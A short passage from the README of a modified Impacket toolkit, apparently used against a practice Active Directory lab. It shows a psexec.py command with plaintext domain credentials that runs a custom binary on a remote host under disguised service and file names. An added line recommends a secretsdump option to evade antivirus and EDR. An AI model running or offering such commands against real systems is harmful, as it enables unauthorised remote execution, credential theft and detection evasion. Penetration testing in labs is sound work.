HexRav3n/impacket-mod/README.md

 ```
 python3 psexec.py north.sevenkingdoms.local/jeor.mormont:'_L0ngCl@w_'@192.168.56.22 -file ../psexec-mod/NjWQJYhRSvc.exe -service-name "PrintWorkflow_7c3bc" -remote-binary-name "WMSysPr9.exe" -debug
 ```
+For secretsdump.py use the `-use-remoteSSMethod` switch to evade some AV/EDR's

 Impacket is a collection of Python classes for working with network protocols.
 Impacket is focused on providing low-level